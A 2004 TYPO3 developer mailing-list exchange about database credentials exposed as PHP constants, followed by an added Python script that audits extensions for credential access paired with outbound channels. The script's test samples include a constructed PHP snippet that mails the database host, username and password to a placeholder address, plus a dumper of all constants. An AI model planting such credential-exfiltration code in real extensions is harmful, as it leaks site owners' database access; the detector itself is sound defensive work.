[Typo3-dev] defined vars

Ernesto Baschny ernst at baschny.de
Wed Oct 20 15:25:54 CEST 2004


On Wed, 20 Oct 2004, Daniel Gercke wrote:

> during writing my own extension I have called get_defined_constants().
> And I couldn't believe what I saw:
>
> TYPO3_db	real_db_name
> TYPO3_db_username	real_username
> TYPO3_db_password	real_password
> TYPO3_db_host	real_host
>
> I think this is a security hole (typo3 v. 3.6.2).
> If I think about it, I could write an extension which is used by many
> people, and it can mail me some database accounts.

If you install an extension locally it can do much worse than that. Having
the password as a constant, a global variable, or just hidden in some
typo3-file doesn't make a difference, because all extensions run in the same
context as the typo3 core.

So what do you suggest to minimize the problem? Typo3 needs to connect to
the database, and it needs to be protected by a password. Typo3 needs to
be able to do this without user intervention.

This "problem" appears on every other PHP/Java/etc. Web application that
accesses a database.

Just don't trust any extension you load from the Internet, unless it is
"certified" somehow. :)

Cheers,
Ernesto
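A small static triage check, added here as an example and not part of the original thread or of TYPO3 itself: it scans an extension's PHP source for references to the four credential constants named above, for a reflective dump via get_defined_constants(), and for an outbound channel the data could leave through. The sample extension sources are constructed for the example; the function names matched are standard PHP, and a hit only means "review this extension by hand", not proof of malice.

```python
import re

# Constructed sample extension sources (not real TYPO3 extensions).
CLEAN_EXT = """<?php
$res = $GLOBALS['TYPO3_DB']->exec_SELECTquery('uid', 'pages', 'deleted=0');
"""

SUSPECT_EXT = """<?php
$creds = array(TYPO3_db_host, TYPO3_db_username, TYPO3_db_password);
mail('someone@example.invalid', 'creds', implode(':', $creds));
"""

DUMPER_EXT = """<?php
$all = get_defined_constants();
file_put_contents('/tmp/c.txt', print_r($all, true));
"""

# The constants from the thread; longer names first so alternation is unambiguous.
CREDENTIAL_CONSTANTS = (
    "TYPO3_db_username", "TYPO3_db_password", "TYPO3_db_host", "TYPO3_db",
)

# Direct reference to a credential constant (case-sensitive, whole identifier).
_CONST_RE = re.compile(r"\b(" + "|".join(map(re.escape, CREDENTIAL_CONSTANTS)) + r")\b")
# Reflective dump of every defined constant, which includes the credentials.
_DUMP_RE = re.compile(r"\bget_defined_constants\s*\(")
# Standard PHP functions that move data out of the process (mail, sockets, HTTP, files).
_CHANNEL_RE = re.compile(
    r"\b(mail|fsockopen|curl_init|file_get_contents|file_put_contents)\s*\("
)


def audit_extension(source: str) -> dict:
    """Return findings for one extension's PHP source as a plain dict."""
    constants = sorted(set(_CONST_RE.findall(source)))
    dumps = _DUMP_RE.search(source) is not None
    channels = sorted(set(_CHANNEL_RE.findall(source)))
    # Flag for review when credential access (direct or via a dump) is combined
    # with any outbound channel; either alone is common in legitimate code.
    review = bool(constants or dumps) and bool(channels)
    return {
        "credential_constants": constants,
        "dumps_constants": dumps,
        "channels": channels,
        "review": review,
    }
```

Run it over each ext_*.php file of an extension before installing it; the extensions flagged for review still need a human read, since the check knows nothing about what the data is used for.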
